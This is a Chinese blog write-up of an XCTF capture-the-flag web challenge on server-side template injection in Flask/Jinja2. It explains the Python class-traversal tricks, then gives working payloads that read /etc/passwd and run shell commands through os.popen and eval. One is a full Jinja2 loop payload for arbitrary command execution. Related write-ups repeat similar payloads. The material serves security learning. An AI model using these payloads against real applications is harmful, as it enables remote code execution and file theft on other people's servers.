XCTF-攻防世界CTF平台-Web类——12、Web_python_template_injection(SSTI服务器模板注入、Flask框架之Jinja2模板渲染引擎)

最新推荐文章于 2024-08-10 10:46:55 发布
置顶 最新推荐文章于 2024-08-10 10:46:55 发布
阅读量1.6k 收藏 12
点赞数 4
分类专栏: # Bugku、XCTF-WEB类写题过程 文章标签: web安全 php 前端 Python python模板注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Onlyone_1314/article/details/121569766
版权

目录标题

打开题目地址:
在这里插入图片描述

提示python模板注入,和题目的名字:Web_python_template_injection一样,都是让我们利用python模板注入漏洞来获取flag。

模板引擎

模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档。在Asp下有模板引擎,在PHP下也有模板引擎,在C#下也有,甚至JavaScript、WinForm开发都会用到模板引擎技术。
这里就是用模板引擎可以让php代码和html代码进行分离。

SSTI服务器模板注入

SSTI即(server-side template injection)服务器模板注入。SST服务器模板信任了用户的输入,并且执行这些内容,包括执行本机函数。模板注入的原理也很类似sql注入、xss注入、xml注入、命令注入等,都是通过输入一些指令在后端处理进行了语句的拼接然后执行。就像eval函数对传入的内容未加任何过滤一样。因此模板注入(SSTI)很容易导致远程代码执行(RCE)、信息泄露等漏洞。

python模板注入

python模板注入漏洞的产生在于Flask应用框架中render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串,而且Flask模板中使用了Jinja2作为模板渲染引擎,{{}}在Jinja2中作为变量包裹标识符,在渲染的时候将{{}}包裹的内容作为变量解析替换,比如{undefined{1+1}}会被解析成2。

Flask应用框架

Flask是一个使用 Python 编写的轻量级Web应用框架。其WSGI(Web服务器网关接口)工具箱采用 Werkzeug ,模板引擎则使用Jinja2。flask在渲染时主要使用以下两种方法:

render_template
render_template_string

render_template用于渲染html文件,而render_template_string用于渲染html语句,当这个html语句是受用户控制的时候,就会出问题了。

Jinja2模板渲染引擎

Jinja2引擎存在以下三种语法:

控制结构{% %}
变量取值{{ }}
注释{# #}

  jinja2模板中使用{{}}语法表示一个变量,它是一种特殊的占位符。当利用jinja2进行渲染的时候,它会把这些特殊的占位符进行填充/替换,jinja2支持python中所有的Python数据类型比如列表、字段、对象等。问题就出在这里,{{}}内的内容,Jinja2渲染时不仅仅只进行填充和替换,还能够执行部分表达式。

例如一段后端使用Flask框架的代码:

from flask import Flask,url_for,redirect,render_template,render_template_string
@app.route('/index/')
def test():
    code = request.args.get('id')
    html =%(code)
    return render_template_string(html)

获取用户id之后,直接用render_template_string()函数渲染之后返回前端页面。
当你访问

127.0.0.1:8080/index/?id=1

页面就会显示1
当你访问

127.0.0.1:8080/index/?id={{1+1}}

页面就会显示2

Python中常用于ssti的魔术方法

__class__:返回类型所属的对象
__mro__:返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
__base__:返回该对象所继承的基类// __base__和__mro__都是用来寻找基类的

__subclasses__:每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
__init__:类的初始化方法
__globals__:对包含函数全局变量的字典的引用
__builtins__:builtins即是引用,Python程序一旦启动,它就会在程序员所写的代码没有运行之前就已经被加载到内存中了,而对于builtins却不用导入,它在任何模块都直接可见,所以可以直接调用引用的模块

  所以我们利用服务器模板注入的流程就是:获取基本类->获取基本类的子类->在子类中找到关于命令执行和文件读写的模块->使用其中的函数。

回到题目
访问:

http://111.200.241.244:58985/{{1+1}}

在这里插入图片描述

成功返回了{{1+1}}的计算结果,说明存在python模板注入漏洞。
先用{{config.items()}}可以查看服务器的配置信息:

http://111.200.241.244:53862/{{config.items()}}

在这里插入图片描述

获取基类的一些方法

[].__class__.__base__
().__class__.__base__
{}.__class__.__base__    
''.__class__.__mro__[2]       //查看第三个基类
[].__class__.__bases__[0]

这5个都是返回该对象所继承的基类,
访问:

http://111.200.241.244:53862/{{().__class__.__base__}}

在这里插入图片描述

''.__class__.__mro__

用来查看所有基类,
访问:

http://111.200.241.244:53862/{{''.__class__.__mro__}}

在这里插入图片描述

获取基本类的子类

>>> [].__class__.__base__.__subclasses__()

之后可以查看所有基本类的子类:

http://111.200.241.244:53862/{{[].__class__.__base__.__subclasses__()}}

在这里插入图片描述

ssti服务器模板注入的主要目的就是从这么多的子类中找出可以利用的类(一般是指读写文件的类)加以利用。其中我们可以利用的类有<type ‘file’>等。file一般是第40号,例如利用file类执行读取/etc/passwd文件:

>>> ().__class__.__base__.__subclasses__()[40]('/etc/passwd').read()

访问:

http://111.200.241.244:53862/{{().__class__.__base__.__subclasses__()[40]('/etc/passwd').read()}}

在这里插入图片描述

得到指定目录下的/etc/passwd文件内容

四种方法读取flag

(1)site._Printer类调用os.popen函数执行任意命令

由于我们想要读取到flag文件里的信息,所以选用 os.popen,首先我们要找到os模块的位置,他是位于<class ‘site._Printer’>里面 ,结果查找在第71个类。
之后通过.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('命令行语句').read()来调用服务器的控制台并显示。
  我们访问:

http://111.200.241.244:53862/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}

在这里插入图片描述

得到本级目录下有文件fl4g和index.py
之后执行cat fl4g查看文件内容即可
访问:

http://111.200.241.244:52490/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}

在这里插入图片描述

得到flag:ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

(2)site._Printer类调用os.listdir函数执行查看本级目录下的文件

类似的,.__init__.__globals__['os'].listdir('.')函数也可以读取本级目录下的文件:

>>>().__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')

访问:

在这里插入图片描述

得到本级目录下有文件fl4g和index.py
之后查看fl4g文件内容即可,除了(1)中的任意命令执行使用catfl4g命令,也可以使用开始的第40号file类执行读取fl4g文件:
访问:

http://111.200.241.244:52490/{{().__class__.__base__.__subclasses__()[40]('fl4g').read()}}

在这里插入图片描述

得到flag:ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

(3)catch_warnings类的linecache函数执行任意命令

os模块都是从catch_warnings类入手的,在所有模块中查找catch_warnings类的位置:

http://111.200.241.244:53862/{{[].__class__.__base__.__subclasses__()}}

在这里插入图片描述

为所有继承的基类中的第59个
之后查看catch_warnings类都存在哪些全局函数,可以找到linecache函数,os模块就在其中:

http://111.200.241.244:53862/{{[].__class__.__base__.__subclasses__()[59].__init__.func_globals.keys()}}

在这里插入图片描述

linecache函数在catch_warnings模块的第13个函数,
之后linecache函数通过调用eval函数执行__import__("os").popen("ls").read()命令即可实现任意命令执行。
访问:

http://111.200.241.244:53862/{{().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls").read()' )}}

在这里插入图片描述

也同样查看到当前目录下的文件fl4g和index.py
之后我们使用linecache函数调用eval函数执行__import__(“os”).popen(“cat fl4g”).read()命令。
访问:

http://111.200.241.244:52490/{{().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("cat fl4g").read()' )}}

在这里插入图片描述

得到flag:ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

(4)遍历基类找函数执行__import __(“os”).popen(“ls”).read()命令

直接通过循环遍历逐层找到catch_warnings类,然后找到linecache函数,之后调用eval函数执行('__import__("os").popen("ls").read()'),可以自动寻找相应函数实现任意命令执行:

{% for c in [].__class__.__base__.__subclasses__() %}//在所有继承的基类中
{% if c.__name__ == 'catch_warnings' %}  //先找到catch_warnings类
  {% for b in c.__init__.__globals__.values() %}//在所有catch_warnings类的全局变量函数的字典的引用中  
  {% if b.__class__ == {}.__class__ %}//某个函数的字典的引用的所属类和当前对象所属类相同
    {% if 'eval' in b.keys() %}    //找到eval函数
      {{ b['eval']('__import__("os").popen("ls").read()') }}  //导入cmd 执行popen里的命令 read读出数据
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

访问:

http://111.200.241.244:52490/http://111.200.241.244:52490/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}  {% for b in c.__init__.__globals__.values() %}    {% if b.__class__ == {}.__class__ %}    {% if 'eval' in b.keys() %}       {{ b['eval']('__import__("os").popen("ls").read()') }}    {% endif %}  {% endif %}  {% endfor %}{% endif %}{% endfor %}

在这里插入图片描述

之后我们可以继续通过循环遍历逐层找到catch_warnings类,然后找到linecache函数,之后调用eval函数执行('__import__("os").popen("cat fl4g").read()')

{% for c in [].__class__.__base__.__subclasses__() %}//在所有继承的基类中
{% if c.__name__ == 'catch_warnings' %}  //先找到catch_warnings类
  {% for b in c.__init__.__globals__.values() %}//在所有catch_warnings类的全局变量函数的字典的引用中  
  {% if b.__class__ == {}.__class__ %}//某个函数的字典的引用的所属类和当前对象所属类相同
    {% if 'eval' in b.keys() %}    //找到eval函数
      {{ b['eval']('__import__("os").popen("cat fl4g").read()') }}  //导入cmd 执行popen里的命令 read读出数据
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

访问

http://111.200.241.244:52490/http://111.200.241.244:52490/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}  {% for b in c.__init__.__globals__.values() %}    {% if b.__class__ == {}.__class__ %}    {% if 'eval' in b.keys() %}       {{ b['eval']('__import__("os").popen("cat fl4g").read()') }}    {% endif %}  {% endif %}  {% endfor %}{% endif %}{% endfor %}

在这里插入图片描述

得到flag:ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

大灬白
关注
专栏目录
攻防世界CTF Web_python_template_injection
cadandme的博客
02-15 3701
记录模块注入学习过程 题目:Web_python_template_injection提醒是模块注入Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 模块注入测试: 网址输入“{{1*21}}”页面显示21,说面存在“SSTI” 在其他大佬的博客中收集的相关知识: SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对pyt
[XCTF]攻防世界Web_python_template_injection模板注入
qq_37301470的博客
11-20 3522
模板注入 在url后访问地址/{{7*7}} 返回49 于是是模板注入 payload: http://111.200.241.244:52204/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% e
攻防世界】十二、Web_python_template_injection
Hi~ 土拨鼠
09-16 1107
步骤 打开所给场景,根据所给提示是python模板注入 尝试一下漏洞是否存在:payload:/{{1+1}} 发现{{}}中的表达式被执行,构造命令执行payload:{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}} 发现flag,将上述payload中的ls改为cat fl4g即可获得目标:{{''.__class__.__mro__[2].__subcl.
CTF赛题分析之 Flask 目录穿越
最新发布
zzz6583zz的博客
08-10 400
最近身边有萌新想打ctf,我作为一个曾经接触过一点点ctf的业余菜鸡,就索性做了一道Web题。这篇文章主要是面向想开始打ctf的萌新,所以很多地方可能都比较简单。如有错误之处,欢迎各位指正。Flask库是一个非常小型的Python Web开发框架。它有两个主要依赖:路由、调试和 Web 服务器网关接口(Web Server Gateway Interface,WSGI)子系统由 Werkzeug(werkzeug.pocoo.org/)提供;模板系统由Jinja2(jinja.pocoo.org/)提供。
XCTF-Web-高手区-Web_python_template_injection
1stPeak's Blog
06-21 317
题目 解题 1、题目提示为python模板注入 猜测这里是SSTI(Server-Side Template Injection) 服务端模板注入,就是服务器模板中拼接了恶意用户输入导致各种漏洞。通过模板Web应用可以把输入转换成特定的HTML文件或者email格式 2、测试一下 http://111.200.241.244:53038/{{1+1}} 经过该测试,说明存在SSTI 3、那么接下来可以使用相关payload进行验证 (1)payload1 查看所有模块 http://111.200.
攻防世界WEB---Web_python_template_injection
Red Rapefruit
07-24 614
有关python模板注入漏洞的学习
攻防世界Web_python_template_injection
2302_79800344的博客
04-01 1163
【代码】【攻防世界Web_python_template_injection
dice_game [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列12
重新启程
12-23 1829
题目地址:dice_game 从这篇开始就正式进入高手进阶区,一些简单的知识点我这里就不会再重复赘述了,请有需要的同学看前面的章节。 废话不多,看看题目 题目没什么提示,只是知道这个题目的来源是:XCTF 4th-QCTF-2018 下载附件,看看情况,照例做下保护机制检查 root@mypwn:/ctf/work/python/dice_game# checksec dice_g...
攻防世界 web高手进阶区 10分题 biscuiti-300
闵行小鱼塘
11-07 1096
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是biscuiti-300的writeup
XCTF系列 // Web | php_rce & Web_python_template_injection
qq_45805420的博客
07-26 274
前言 这两题涉及到的知识点有,ThinkPHP 的远程代码执行漏洞 以及 flaskSSTI 漏洞(服务端模板注入) 。   由于水平有限,关于以上内容的了解均只到表面,具体漏洞原理尚未看明白,详细分析只好以后再补,在这里先参照网上的 writeup,照猫画虎,略微整理分析一下解题思路与流程。 1` php_rce ThinkPHP 是一个轻量级国产 PHP 开发框架,它可以支持 windows/Unix/Linux 等服务器环境。在 ThinkPHP 5 中出现了由于变量覆盖而引起的 RCE(远程命令
XCTF-攻防世界-密码学crypto-新手练习区-writeup
热门推荐
Ryannn_的博客
10-23 1万+
目录 0x00 base64 0x01 Caesar 0x02 Morse 0x03 Railfence 0x04 转轮机加密 0x05 easy_RSA 0x06 Normal_RSA 0x07 不仅仅是Morse 0x08 混合编码 0x09 easychallenge 0x0A easy_ECC 0x0B 幂数加密 0x00 base64 元宵节灯谜是一种古老的传...
攻防世界-web Web_python_template_injection
m0_48108919的博客
02-11 3385
提示python模板注入 随便输入个/test目录查看,提示not found,并且把我们的输入test进行了输出,可以尝试在这个位置进行注入 1.判断模板引擎: 找到收藏已久的模板注入图 首先从${7*7}开始测试:并没有执行 继续测试{{7*7}}:执行成功,输出了49 因为Twig是php模板,所有可以确定模板Jinja2 2.直接百度搜索Jinja2模板注入漏洞 参考:https://blog.csdn.net/qq_36374896/arti...
攻防世界-web-Web_python_template_injection
wuh2333的博客
06-16 2407
攻防世界python模板注入
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1207
好难啊
攻防世界 Web_python_template_injectionflask模版注入
weixin_73399382的博客
07-06 1388
通过调用__class__.__mro__,可以获取该的方法解析顺序(Method Resolution Order,MRO),它是一个元组,按照查找方法时的顺序列出了对象所属及其父。解析:"".__class__.__mro__[2].__subclasses__()方法返回的是可用(classes),而不是对象(objects)。综上所述,"".__class__.__mro__[2].__subclasses__()方法返回的是可用(classes)SSTI与这个方法密不可分。
攻防世界Web_python_template_injectionweb进阶)
my_name_is_sy的博客
06-29 2046
考点为模板漏洞及其利用。
攻防世界 web进阶区 Web_python_template_injection
m0_51395584的博客
06-17 1100
攻防世界 web进阶区 Web_python_template_injection pythonflask模板漏洞利用,本人对这个模板也不是很熟悉,大家将就看吧。
XCTF---Web_python_template_injection
weixin_45895555的博客
05-28 492
python template injection (对于出学的我来说)python模板注入不熟。所以花了一天的时间看了不少文章,也慢慢了解了Flask/Jinja2.输入后显示 之后输入**{{config.items()}}是可以爆出一些内容的 这里有些内容较深就不细究了,当然没法得到有利信息。之后有偿试爆了一下(看了文章,师傅说<type ‘file’>**,它是文件系统访问的关键但是还没找到方法,所以 继续了一篇) ...
2020.3.31 xctf(Web_python_template_injection)①
DSR446的博客
03-31 327
根据题意可知python模块注入 测试payload:http://111.198.29.45:31069/{{3+4}} 执行了{{}}中的代码。 {{''.__class__.__mro__[2].__subclasses__()}} {{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].list...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值